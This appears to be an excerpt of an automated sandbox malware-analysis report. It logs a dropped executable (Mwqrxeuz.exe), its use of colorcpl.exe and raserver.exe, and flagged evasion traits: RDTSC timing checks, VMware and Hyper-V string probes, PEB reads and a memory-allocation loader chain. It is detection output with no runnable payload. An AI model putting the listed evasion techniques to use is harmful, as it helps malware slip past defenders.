          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000010418604 second address: 000000001041860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000001041899E second address: 00000000104189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002D88604 second address: 0000000002D8860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002D8899E second address: 0000000002D889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E56DE6 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 4.2 %
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02175B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,
          Source: C:\Users\user\Desktop\0321423605241625.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\0321423605241625.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.477730191.000000000ED50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.477730191.000000000ED50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}217G
          Source: explorer.exe, 00000002.00000000.312701350.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 0321423605241625.exe, 00000000.00000002.307257682.000000000083B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0X
          Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: Mwqrxeuz.exe, 00000003.00000002.542721424.000000000074D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 0321423605241625.exe, 00000000.00000002.307257682.000000000083B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02186388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E56DE6 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
